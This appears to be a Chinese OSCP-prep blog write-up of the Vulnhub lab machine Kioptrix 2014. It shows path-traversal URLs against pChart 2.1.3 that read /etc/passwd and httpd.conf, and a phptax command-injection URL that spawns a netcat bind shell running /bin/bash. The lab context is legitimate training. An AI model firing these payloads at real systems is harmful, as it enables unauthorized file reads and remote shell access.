EthanDoctor

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

Ethan医生6个月前靶场214
名称说明
靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.167

信息收集

arp-scan

image.png


nmap

image.png

80端口访问


image.png

image.png


8080端口限制访问


image.png


查看F12发现head里面 出现pChart2.1.3/index.php

image.png


http://192.168.233.172/pChart2.1.3/examples/index.php 访问看看

image.png


使用searchsploit 看看有没有pchart漏洞


image.png

cat /usr/share/exploitdb/exploits/php/webapps/31173.txt查看

image.png

http://192.168.233.172/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

image.png


这样就可以看8080端口出现啥限制

http://192.168.233.172/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

image.png

可以接收 env=Mozilla4_browser



image.png


image.png


固定修改UA头

谷歌phptax exploit,发现一个rce

https://www.exploit-db.com/exploits/21665



http://192.168.233.172/phptax/drawimage.php?pfilez=xxx; nc -l -v -p 23235 -e /bin/bash;&pdf=make



内核提权






























标签: OSCP
返回列表

上一篇:OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

下一篇:OSCP备考_0x06_Vulnhub靶机_Tr0ll: 1

相关文章

OSCP备考_0x17_Vulnhub靶机_joy

OSCP备考_0x17_Vulnhub靶机_joy

名称说明靶机下载链接攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.143.34 (扫描TCP)nmap -sU --top-ports 100 10.129...

OSCP备考_0x38_HackThBox靶机_Windows_Devel

OSCP备考_0x38_HackThBox靶机_Windows_Devel

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)使用ftp进行连接ftp 10.129.254.198 2...

OSCP备考_0x19_HackThBox靶机_Linux_haircut

OSCP备考_0x19_HackThBox靶机_Linux_haircut

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.82.246 (扫描TCP)        &n...

OSCP备考_0x02_HackThBox靶机_Linux_bashed

OSCP备考_0x02_HackThBox靶机_Linux_bashed

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.217 (扫描TCP)nmap -sU --top-ports 100 10.12...

OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT

OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT

名称说明靶机下载链接https://www.vulnhub.com/entry/digitalworldlocal-torment,299/攻击机(kali)ip:192.168.233.168靶机(...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号